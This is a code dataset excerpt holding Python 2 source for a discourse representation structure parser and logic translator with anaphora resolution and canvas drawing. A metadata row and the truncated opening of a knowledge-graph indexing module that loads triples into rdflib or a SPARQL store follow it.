def resolve_anaphora(self, trail=[]):
trail_addition = [self]
if isinstance(self.first, ApplicationDRS) \
and isinstance(self.first.first, DrsOperator) \
and self.first.first.operator == 'implies':
trail_addition.append(self.first.second)
r_first = self.first.resolve_anaphora(trail + trail_addition)
r_second = self.second.resolve_anaphora(trail + trail_addition)
return self.__class__(r_first, r_second)
def simplify(self):
first = self.first.simplify()
second = self.second.simplify()
if isinstance(first, LambdaDRS):
variable = first.variable
term = first.term
return term.replace(variable, second).simplify()
else:
return self.__class__(first, second)
def infixify(self):
first = self.first.infixify()
second = self.second.infixify()
if isinstance(first, DrsOperator) and not str(first) == 'not':
return self.__class__(second, first)
else:
return self.__class__(first, second)
def toFol(self):
if isinstance(self.first, ApplicationDRS) \
and isinstance(self.first.first, DrsOperator) \
and self.first.first.operator == 'implies':
first_drs = self.first.second
second_drs = self.second
accum = None
for cond in first_drs.conds[::-1]:
if not accum:
accum = cond.toFol()
else:
accum = ApplicationExpression(ApplicationExpression(FolOperator('and'), cond.toFol()), accum)
accum = ApplicationExpression(ApplicationExpression(FolOperator('implies'), accum ), second_drs.toFol())
for ref in first_drs.refs[::-1]:
accum = AllExpression(ref.variable, accum)
return accum
else:
return ApplicationExpression(self.first.toFol(), self.second.toFol())
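# Hedged sketch of the implication translation above: a condition such as
#   (drs([x],[(man x)]) implies drs([],[(walks x)]))
# (cf. expressions() below) becomes, roughly, the FOL formula
#   all x.((man x) implies (walks x))
# that is, the antecedent's conditions are conjoined, wrapped in 'implies' with the
# consequent's translation, and closed under AllExpression for every referent of the antecedent.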
def _skolemise(self, bound_vars, counter):
first = self.first._skolemise(bound_vars, counter)
second = self.second._skolemise(bound_vars, counter)
return self.__class__(first, second)
def __str__(self):
# Print ((M N) P) as (M N P).
strFirst = str(self.first)
if isinstance(self.first, ApplicationDRS) and \
not isinstance(self.second, DrsOperator):
strFirst = strFirst[1:-1]
return '(%s %s)' % (strFirst, self.second)
def __repr__(self): return "ApplicationDRS('%s', '%s')" % (self.first, self.second)
def __hash__(self): return hash(repr(self))
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first._size
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second._size
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = x
if use_parens:
#Draw Open Paren
y_current = y+(max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = y+(max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.draw(x_current, y_current, canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = y+(max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = self.second.draw(x_current, y_current, canvas)
else:
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=self.second)
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(max_height-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, y+max_height)
def get_drawing_size(self, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first.get_drawing_size(canvas)
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second.get_drawing_size(canvas)
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
#Draw Open Paren
y_current = (max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = (max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = (x_current+self.first._size[0], y_current+self.first._size[1])
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = (max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = (x_current+self.second._size[0], y_current+self.second._size[1])
else:
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
# keep the running width in step with draw(): include 'second' even without parentheses
x_current = second_bottom_right_corner[0]
if use_parens:
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max_height)
return self._size
class ConcatenationDRS(ApplicationDRS):
"""DRS of the form '(DRS + DRS)'"""
def __init__(self, first, second):
AbstractDRS.__init__(self)
first_simp = first.simplify()
second_simp = second.simplify()
assert (isinstance(first, ApplicationDRS) and isinstance(first_simp.first, DrsOperator) and first_simp.first.operator == Tokens.DRS_CONC and isinstance(second, AbstractDRS)) or \
(isinstance(first, ApplicationDRS) and isinstance(first_simp.second, DrsOperator) and first_simp.second.operator == Tokens.DRS_CONC and isinstance(second, AbstractDRS))
self.first = first
self.second = second
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
first = self.first
second = self.second
all_refs = self.get_refs()
for ref in all_refs: # for every ref, across the whole concatenation sequence
if ref.variable in expression.free():
v = VariableExpression(Variable('z' + str(DRS._counter.get()))) #get a new var name
first = first.replace(ref.variable, v, True)
second = second.replace(ref.variable, v, True)
first = first.replace(variable, expression, replace_bound)
second = second.replace(variable, expression, replace_bound)
return self.__class__(first, second)
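# Hedged restatement of the capture-avoidance above: before the requested substitution is
# made, any referent of the concatenated boxes whose variable also occurs free in the
# replacement expression is renamed to a fresh 'z<N>' in both halves, so the incoming
# expression cannot be accidentally bound by the boxes' own referents.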
def resolve_anaphora(self, trail=[]):
r_first = self.first.resolve_anaphora(trail + [self])
r_second = self.second.resolve_anaphora(trail + [self])
return self.__class__(r_first, r_second)
def get_refs(self):
return self.first.get_refs() + self.second.get_refs()
def simplify(self):
first = self.first.simplify()
second = self.second.simplify()
if isinstance(first.second, DRS) and isinstance(second, DRS):
r_refs = first.second.refs + second.refs
r_conds = first.second.conds + second.conds
return DRS(r_refs, r_conds)
else:
return self.__class__(first,second)
def toFol(self):
return ApplicationExpression( ApplicationExpression(FolOperator('and'), self.first.second.toFol()), self.second.toFol())
def __repr__(self): return "ConcatenationDRS('%s', '%s')" % (self.first, self.second)
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
first_size = self.first._size
second_size = self.second._size
max_height = max(first_size[1], second_size[1])
x_current = x
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
if use_parens:
canvas.create_text(x_current, y+(first_size[1]-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
first_bottom_right_corner = self.first.draw(x_current, y + (max_height - first_size[1])/2, canvas, first_use_parens)
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
second_bottom_right_corner = self.second.draw(x_current, y + (max_height - second_size[1])/2, canvas)
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(first_size[1]-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, max(first_bottom_right_corner[1], second_bottom_right_corner[1]))
def get_drawing_size(self, canvas=None, use_parens=True):
if not canvas:
canvas = init_canvas(self)
first_size = self.first._size
second_size = self.second._size
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
first_size = self.first.get_drawing_size(canvas, first_use_parens)
x_current += first_size[0] + canvas.font.measure(' ')
second_size = self.second._size
x_current += second_size[0]
if use_parens:
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max(first_size[1], second_size[1]))
return self._size
class ApplicationExpression(Expression, logic.ApplicationExpression):
def _arglist(self):
"""Uncurry the argument list."""
arglist = [self.second]
if isinstance(self.first, ApplicationExpression):
arglist.extend(self.first._arglist())
return arglist
def resolve_anaphora(self, trail=[]):
if isinstance(self.first, VariableExpression) and self.first.variable.name == Tokens.PRONOUN:
possible_antecedents = PossibleAntecedents()
for ancestor in trail:
if isinstance(ancestor, AbstractDRS):
possible_antecedents.extend(ancestor.get_refs())
#===============================================================================
# This line ensures that statements of the form ( x = x ) won't appear.
# Possibly amend to remove antecedents with the wrong 'gender'.
#===============================================================================
possible_antecedents.remove(self.second)
if len(possible_antecedents) == 1:
equalityExp = ApplicationExpression(ApplicationExpression(FolOperator(Tokens.EQ), self.second), possible_antecedents[0])
else:
equalityExp = ApplicationExpression(ApplicationExpression(FolOperator(Tokens.EQ), self.second), possible_antecedents)
return equalityExp
else:
r_first = self.first.resolve_anaphora(trail + [self])
r_second = self.second.resolve_anaphora(trail + [self])
return self.__class__(r_first, r_second)
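# Hedged illustration of the PRO branch above: resolving a box like
#   drs([x,y],[(dog x), (walks y), (PRO y)])
# replaces the (PRO y) condition with an equality between y and its possible antecedents
# collected from the enclosing DRSs (here just x, giving roughly (y = x));
# testResolve_anaphora() below runs concrete cases of this.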
def toFol(self):
return self.__class__(self.first.toFol(), self.second.toFol())
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first._size
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second._size
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = x
if use_parens:
#Draw Open Paren
y_current = y+(max_height-canvas.font.metrics("linespace"))/2
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=Tokens.OPEN_PAREN)
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = y+(max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.draw(x_current, y_current, canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = y+(max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
second_bottom_right_corner = self.second.draw(x_current, y_current, canvas)
else:
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=self.second)
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
x_current = second_bottom_right_corner[0]
if use_parens:
canvas.create_text(x_current, y+(max_height-canvas.font.metrics("linespace"))/2, anchor='nw', font=canvas.font, text=Tokens.CLOSE_PAREN)
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
return (x_current, y+max_height)
def get_drawing_size(self, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first.get_drawing_size(canvas)
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second.get_drawing_size(canvas)
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = 0
if use_parens:
#Draw Open Paren
y_current = (max_height-canvas.font.metrics("linespace"))/2
x_current += canvas.font.measure(Tokens.OPEN_PAREN)
######################################
# Handle 'first'
######################################
y_current = (max_height-first_size[1])/2
if isinstance(self.first, AbstractDRS):
first_bottom_right_corner = self.first.get_drawing_size(canvas, first_use_parens)
else:
text = str(self.first)
if not first_use_parens:
text = text[1:-1]
first_bottom_right_corner = (x_current+canvas.font.measure(text), y_current+canvas.font.metrics("linespace"))
#Put a space between 'first' and 'second'
x_current = first_bottom_right_corner[0] + canvas.font.measure(' ')
######################################
# Handle 'second'
######################################
y_current = (max_height-second_size[1])/2
if isinstance(self.second, AbstractDRS):
# offset by x_current so the computed width matches draw(), as in ApplicationDRS
second_bottom_right_corner = (x_current+self.second._size[0], y_current+self.second._size[1])
else:
second_bottom_right_corner = (x_current+canvas.font.measure(self.second), y_current+canvas.font.metrics("linespace"))
x_current = second_bottom_right_corner[0]
if use_parens:
x_current += canvas.font.measure(Tokens.CLOSE_PAREN)
self._size = (x_current, max_height)
return self._size
class PossibleAntecedents(list, Expression):
def variables(self):
"""Set of all variables."""
raise NotImplementedError
def free(self):
"""Set of free variables."""
return set(self)
def subterms(self):
"""Set of all subterms (including self)."""
return set(self).union([self])
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
result = PossibleAntecedents()
for item in self:
if item == variable:
result.append(expression)
else:
result.append(item)
return result
def simplify(self):
return self
def infixify(self):
return self
def __str__(self):
result = '['
for item in self:
result += item.__str__() + ','
return result.rstrip(',') + ']'
class Tokens:
DRS = 'DRS'
DRS_CONC = '+'
LAMBDA = '\\'
DOT = '.'
COMMA = ','
OPEN_PAREN = '('
CLOSE_PAREN = ')'
OPEN_BRACKET = '['
CLOSE_BRACKET = ']'
DRS_OPS = ['or', 'not', 'implies', 'iff']
DRS_OPS.append(DRS_CONC)
EQ = '='
FOL_OPS = [EQ]
PRONOUN = 'PRO'
class Parser:
"""A lambda calculus expression parser."""
def __init__(self, data=None, constants=None):
if data is not None:
self.buffer = data
self.process()
else:
self.buffer = ''
if constants is not None:
self.constants = constants
else:
self.constants = []
def feed(self, data):
"""Feed another batch of data to the parser."""
self.buffer += data
self.process()
def parse(self, data):
"""
Provides a method similar to other NLTK parsers.
@type data: str
@returns: a parsed Expression
"""
self.feed(data)
result = self.next()
return result
def process(self):
"""Process the waiting stream to make it trivial to parse."""
self.buffer = self.buffer.replace('\t', ' ')
self.buffer = self.buffer.replace('\n', ' ')
self.buffer = self.buffer.replace(Tokens.LAMBDA, ' %s ' % Tokens.LAMBDA)
self.buffer = self.buffer.replace(Tokens.DRS, ' %s ' % Tokens.DRS)
self.buffer = self.buffer.replace(Tokens.DRS.lower(), ' %s ' % Tokens.DRS)
self.buffer = self.buffer.replace(Tokens.DOT, ' %s ' % Tokens.DOT)
self.buffer = self.buffer.replace(Tokens.COMMA, ' %s ' % Tokens.COMMA)
self.buffer = self.buffer.replace(Tokens.OPEN_PAREN, ' %s ' % Tokens.OPEN_PAREN)
self.buffer = self.buffer.replace(Tokens.CLOSE_PAREN, ' %s ' % Tokens.CLOSE_PAREN)
self.buffer = self.buffer.replace(Tokens.OPEN_BRACKET, ' %s ' % Tokens.OPEN_BRACKET)
self.buffer = self.buffer.replace(Tokens.CLOSE_BRACKET, ' %s ' % Tokens.CLOSE_BRACKET)
self.buffer = self.buffer.replace(Tokens.EQ, ' %s ' % Tokens.EQ)
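# Hedged example of what process() leaves in the buffer: an input such as
#   'drs([x],[(man x)])'
# is padded out to roughly ' DRS  ( [ x ] , [ ( man x ) ] ) ', so that token() below can
# split on single spaces (empty fragments are simply skipped while scanning).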
def token(self, destructive=1):
"""Get the next waiting token. The destructive flag indicates
whether the token will be removed from the buffer; setting it to
0 gives lookahead capability."""
if self.buffer == '':
raise Error, "end of stream"
tok = None
buffer = self.buffer
while not tok:
seq = buffer.split(' ', 1)
if len(seq) == 1:
tok, buffer = seq[0], ''
else:
assert len(seq) == 2
tok, buffer = seq
if tok:
if destructive:
self.buffer = buffer
return tok
assert 0 # control never gets here
return None
def isVariable(self, token):
"""Is this token a variable (that is, not one of the other types)?"""
TOKENS = [Tokens.DRS, Tokens.LAMBDA, Tokens.DOT, Tokens.OPEN_PAREN,
Tokens.CLOSE_PAREN, Tokens.OPEN_BRACKET, Tokens.CLOSE_BRACKET]
TOKENS.extend(self.constants)
TOKENS.extend(Tokens.DRS_OPS)
TOKENS.extend(Tokens.FOL_OPS)
return token not in TOKENS
def next(self):
"""Parse the next complete expression from the stream and return it."""
tok = self.token()
if tok == Tokens.LAMBDA:
# Expression is a lambda expression: \x.M
vars = [self.token()]
while self.isVariable(self.token(0)):
# Support expressions like: \x y.M == \x.\y.M
vars.append(self.token())
tok = self.token()
if tok != Tokens.DOT:
raise Error, "parse error, unexpected token: %s" % tok
term = self.next()
accum = LambdaDRS(Variable(vars.pop()), term)
while vars:
accum = LambdaDRS(Variable(vars.pop()), accum)
return accum
elif tok == Tokens.DRS:
# a DRS
assert self.token() == Tokens.OPEN_PAREN
assert self.token() == Tokens.OPEN_BRACKET
refs = []
while self.token(0) != Tokens.CLOSE_BRACKET:
# Support expressions like: drs([x y],C) == drs([x, y],C)
if self.token(0) == Tokens.COMMA:
self.token() # swallow the comma
else:
refs.append(self.next())
assert self.token() == Tokens.CLOSE_BRACKET # swallow the CLOSE_BRACKET token
assert self.token() == Tokens.COMMA
conds = self.next()
assert self.token() == Tokens.CLOSE_PAREN
return DRS(refs, conds)
elif tok == Tokens.OPEN_BRACKET:
# A list of DRS Conditions
conds = []
while self.token(0) != Tokens.CLOSE_BRACKET:
if self.token(0) == Tokens.COMMA:
self.token() # swallow the comma
else:
conds.append(self.next())
self.token() # swallow the CLOSE_BRACKET token
return conds
elif tok == Tokens.OPEN_PAREN:
# Expression is an application expression: (M N)
first = self.next()
second = self.next()
exps = []
while self.token(0) != Tokens.CLOSE_PAREN:
# Support expressions like: (M N P) == ((M N) P)
exps.append(self.next())
tok = self.token() # swallow the CLOSE_PAREN token
assert tok == Tokens.CLOSE_PAREN
if isinstance(second, DrsOperator):
accum = ApplicationDRS(second, first) # DrsOperators can only be applied to DRSs
elif isinstance(second, FolOperator):
accum = ApplicationExpression(second, first)
else:
accum = self.make_Application(first, second)
while exps:
exp, exps = exps[0], exps[1:]
accum = self.make_Application(accum, exp)
return accum
elif tok in self.constants:
# Expression is a simple constant expression: a
return ConstantExpression(Constant(tok))
elif tok in Tokens.DRS_OPS:
# Expression is a boolean operator or the equality symbol
return DrsOperator(tok)
elif tok in Tokens.FOL_OPS:
# Expression is a boolean operator or the equality symbol
return FolOperator(tok)
elif logic.is_indvar(tok):
# Expression is a boolean operator or the equality symbol
return IndVariableExpression(Variable(tok))
else:
if self.isVariable(tok):
if tok[0].isupper() and tok != Tokens.PRONOUN:
# Uppercase variables stand for DRSs
return DRSVariable(Variable(tok))
else:
# Expression is a simple variable expression: x
return VariableExpression(Variable(tok))
else:
raise Error, "parse error, unexpected token: %s" % tok
# This is intended to be overridden, so that you can derive a Parser class
# that constructs expressions using your subclasses. So far we only need
# to override Application, but the same thing could be done for
# other expression types.
def make_Application(self, first, second):
first_simp = first.simplify()
second_simp = second.simplify()
if (isinstance(first_simp, ApplicationDRS) and isinstance(first_simp.first, DrsOperator) and first_simp.first.operator == Tokens.DRS_CONC and isinstance(second_simp, AbstractDRS)) or \
(isinstance(second_simp, ApplicationDRS) and isinstance(second_simp.first, DrsOperator) and second_simp.first.operator == Tokens.DRS_CONC and isinstance(first_simp, AbstractDRS)):
return ConcatenationDRS(first, second)
elif isinstance(first, DrsOperator) or isinstance(first, AbstractDRS):
return ApplicationDRS(first, second)
else:
return ApplicationExpression(first, second)
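# Hedged dispatch sketch for make_Application: an expression like
#   (drs([x],[(walks x)]) + drs([y],[(runs y)]))
# (cf. the commented entries in expressions() below) produces a ConcatenationDRS; applying
# a DRS or a DrsOperator to an argument produces an ApplicationDRS; anything else falls
# back to a plain ApplicationExpression.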
def __repr__(self):
return 'Next token: \'%s\'' % self.token(0)
def __str__(self):
return self.__repr__()
def init_canvas(drs):
#font = Font(family='helvetica', size=12)
buffer = 3
master = Tk()
canvas = Canvas(master, width=0, height=0)
font = Font(font=canvas.itemcget(canvas.create_text(0, 0, text=''), 'font'))
canvas.font = font
canvas._BUFFER = buffer
size = drs.get_drawing_size(canvas)
canvas = Canvas(master, width=size[0]+20, height=size[1]+20, bg='white')
#canvas = Canvas(master, width=300, height=300)
canvas.pack()
canvas.font = font
canvas._BUFFER = buffer
return canvas
def expressions():
return ['drs([x,y],[(sees x y)])',
'drs([x],[(man x), (walks x)])',
'\\x.drs([],[(man x), (walks x)])',
'\\x y.drs([],[(sees x y)])',
'(\\x.drs([],[(walks x)]) john)',
'(\\R x.drs([],[(big x R)]) \\y.drs([],[(mouse y)]))',
# '(drs([x],[(walks x)]) + drs([y],[(runs y)]))',
# '(drs([x,y],[(walks x), (jumps y)]) + (drs([z],[(twos z)]) + drs([w],[(runs w)])))',
# '((drs([],[(walks x)]) + drs([],[(twos x)])) + drs([],[(runs x)]))',
'((drs([],[(walks x)]) + drs([],[(runs x)])) + (drs([],[(threes x)]) + drs([],[(fours x)])))',
# '(drs([],[(walks x)]) + (runs x))',
# '((walks x) + drs([],[(runs x)]))',
# '((walks x) + (runs x))',
'(drs([],[(walks x)]) implies drs([],[(runs x)]))',
# '(drs([],[(walks x)]) implies (runs x))',
# '((walks x) implies drs([],[(walks x)]))',
# '((walks x) implies (runs x))'
'drs([x],[(PRO x),(sees John x)])',
'drs([x],[(man x), (not drs([],[(walks x)]))])',
'drs([],[(drs([x],[(man x)]) implies drs([],[(walks x)]))])'
]
def demo(ex=-1, draw=False, catch_exception=True):
exps = expressions()
for (i, exp) in zip(range(len(exps)),exps):
if i==ex or ex==-1:
drs = Parser().parse(exp).simplify().infixify()
if(not draw):
print '[[[Example %s]]]: %s' % (i, exp)
try:
print ' %s' % drs
except Exception, (strerror):
if catch_exception:
print ' Error: %s' % strerror
else:
raise
print ''
else:
canvas = init_canvas(drs)
y_current = canvas._BUFFER
canvas.create_text(canvas._BUFFER, y_current, anchor='nw', font=canvas.font, text='Example %s: %s' % (i, exp))
try:
y_current += canvas.font.metrics("linespace")+canvas._BUFFER
size = drs.draw(canvas._BUFFER,y_current,canvas)
y_current += size[1]+canvas._BUFFER
drs.draw(canvas._BUFFER, y_current, canvas)
except Exception, (strerror):
if catch_exception:
canvas.create_text(canvas._BUFFER, y_current, anchor='nw', font=canvas.font, text=' Error: %s' % strerror)
else:
raise
def testToFol():
for t in expressions():
p = Parser().parse(t)
s = p.simplify()
f = s.toFol()
i = f.infixify()
print i
def test():
a = Parser().parse(r'\Q.(drs([x],[(dog x)]) + (Q x))')
b = Parser().parse(r'\x2.drs([],[(drs([x],[(girl x)]) implies drs([],[(chases x x2)]))])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def test2():
a = Parser().parse(r'\Q.(drs([x],[(x = john),(walks x)]) + Q)')
b = Parser().parse(r'drs([x],[(PRO x),(leaves x)])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def test3():
a = Parser().parse(r'\Q.drs([],[(drs([x],[(girl x)]) implies (Q x))])')
b = Parser().parse(r'\x1.drs([x],[(dog x),(chases x1 x)])')
ab = a.applyto(b)
print ab
s = ab.simplify()
print s
def testAlpha():
a = Parser().parse(r'\P Q.((drs([x],[(dog x)]) + (P x)) + (Q x))')
print a
x = Parser().parse(r'x')
z = Parser().parse(r'z')
print a.replace(x.variable, z, True)
print a.replace(x.variable, z, False)
print a.replace_unique(x.variable, None, True)
def testResolve_anaphora():
print 'Test resolve_anaphora():'
drs = Parser().parse(r'drs([x,y,z],[(dog x), (cat y), (walks z), (PRO z)])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([],[(drs([x],[(dog x)]) implies drs([y],[(walks y), (PRO y)]))])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([],[((drs([x],[]) + drs([],[(dog x)])) implies drs([y],[(walks y), (PRO y)]))])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
drs = Parser().parse(r'drs([x],[(walks x), (PRO x)])')
print ' ' + str(drs.infixify())
print ' resolves to: ' + str(drs.simplify().resolve_anaphora().infixify()) + '\n'
def testTp_equals():
a = Parser().parse(r'drs([x],[(man x), (walks x)])')
b = Parser().parse(r'drs([x],[(walks x), (man x)])')
print '%s == %s' % (a,b)
print a.tp_equals(b)
if __name__ == '__main__':
demo()
print '\n'
testResolve_anaphora()
print '\n'
testToFol()
| 38.318774
| 192
| 0.578316
|
ded6f61d36a2c727d22cd5be279481a79c981a80
| 5,119
|
py
|
Python
|
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | 5
|
2020-11-17T19:59:49.000Z
|
2021-09-23T23:10:39.000Z
|
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
excut/kg/kg_indexing.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
import math
import numpy as np
from SPARQLWrapper import SPARQLWrapper, JSON, POST
from rdflib import Graph
from rdflib import URIRef
from excut.kg.utils import data_formating
from excut.utils.logging import logger
from excut.kg.utils.data_formating import entity_full_url, relation_full_url
from excut.kg.kg_triples_source import TriplesSource, FileTriplesSource
from tqdm import tqdm
# sys.path.append(os.path.abspath(os.path.join('..', '*')))
class Indexer():
"""
Index the KG in either a sparql engine or in memory. This is required for rule learning
"""
def __init__(self, store='remote', endpoint=None, identifier=None, graph=None, batch_size=100,
remove_invalid_ids=True):
self.remove_invalid_ids = remove_invalid_ids
self.batch_size = batch_size
self.store = 'SPARQLUpdateStore' if store == 'remote' or store == 'SPARQLUpdateStore' else 'default'
self.endpoint = endpoint
self.identifier = identifier
self.graph = graph
def index_triples(self, triples_source: TriplesSource, prefix='', safe_urls=False, drop_old=False):
if drop_old:
logger.info("Drop %s " % self.identifier)
self.drop()
if self.store != 'SPARQLUpdateStore' and not self.graph:
self.graph = Graph(store=self.store, identifier=self.identifier)
# print(self.graph.store)
# if self.store == 'SPARQLUpdateStore':
# self.graph.open(self.endpoint)
# self._index(triples_source, prefix, safe_urls)
self._index_np(triples_source) # , prefix, safe_urls)
return self.graph
def _index_np(self, triples_source, prefix='', safe_urls=False):
logger.info("Start indexing " + triples_source.get_name())
data = triples_source.as_numpy_array()
data_size = triples_source.size()
number_splits = math.ceil(data_size / self.batch_size)
logger.info("data size %i" % data_size)
logger.info("chunks %i" % number_splits)
# ch=0
chunks = np.array_split(data, number_splits)
for chunk in tqdm(chunks):
if self.store == 'SPARQLUpdateStore':
self.insert_sparql(chunk)
else:
self.insert_memory(chunk)
logger.info("Done indexing " + triples_source.get_name())
def drop(self):
if self.store == 'SPARQLUpdateStore':
if self.graph_exists():
return self._drop_sparql()
else:
self.graph = Graph(store=self.store, identifier=self.identifier)
return True
return True
def insert_memory(self, triples):
chunk_context = [(URIRef(s), URIRef(p), URIRef(o), self.graph) for s, p, o in triples]
self.graph.addN(chunk_context)
return True
def insert_sparql(self, triples):
triples_filtered = filter(lambda a: data_formating.valid_id_triple(a),
triples) if self.remove_invalid_ids else triples
query = 'INSERT DATA into <%s> {%s}' % (
self.identifier, '\n'.join(map(data_formating.sparql_repr, triples_filtered)))
# print(query)
sparql = SPARQLWrapper(self.endpoint)
sparql.setMethod(POST)
sparql.setReturnFormat(JSON)
